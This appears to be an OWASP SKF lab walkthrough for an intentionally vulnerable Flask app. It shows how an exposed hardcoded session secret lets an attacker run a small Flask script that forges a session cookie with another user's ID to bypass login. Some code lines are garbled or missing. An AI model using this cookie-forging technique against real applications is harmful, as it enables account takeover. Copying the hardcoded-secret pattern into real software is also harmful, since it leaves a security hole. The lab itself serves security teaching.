Python - Auth Bypass

Running the app on Docker

$ sudo docker pull blabla1337/owasp-skf-lab:auth-bypass
$ sudo docker run -ti -p blabla1337/owasp-skf-lab:auth-bypass
Now that the app is running let's go hacking!


Let's login with admin/admin:
Once we login we see an API key.
Let's have a look at the source code:
SECRET_KEY= "e5ac-4ebf-03e5-9e29-a3f562e10b22",
@app.route("/login", methods=['GET', 'POST'])
def login():
sqli = Classes()
if request.method == "POST":
values = sqli.getUser(request.form['username'])
if values:
if values[0][2] == request.form['password']:
session['userId'] = values[0][0]
session['secret'] = app.config['SECRET_KEY']
session['loggedin'] = True
pref = sqli.getApi(values[0][0])
api = pref[0][0]
return render_template("loggedin.html", api = api)
return render_template("index.html")
pref = sqli.getApi(session['userId'])
api = pref[0][0]
return render_template("loggedin.html", api = api)
We can see the cookie session secret is exposed, now we can try to recreate this application cookie implementation to be able to recreate a cookie to bypass the authentication.


We can start building our malicious server.
from flask import Flask, request, url_for, render_template, redirect, make_response, session
app = Flask(__name__, static_url_path='/static', static_folder='static')
SECRET_KEY= "e5ac-4ebf-03e5-9e29-a3f562e10b22",
app.config['DEBUG'] = True
def start():
session['userId'] = 2 # CHANGING USER ID
session['secret'] = app.config['SECRET_KEY']
session['loggedin'] = True
return render_template("evil.html")
if __name__ == "__main__":'', port=1337)
Save the snippet above to > and run the commands below to install some dependencies. Of course you can also run your app on whatever service you want it does not have to be python flask.
$ pip3 install flask
Save the following snippet code into /templates/evil.html
<p>The newly created cookie for doing the bypass:</p>
We are ready to start our server:
$ python3
Now we can replace our original cookie with the tampered cookie.
Send the request again:

Additional sources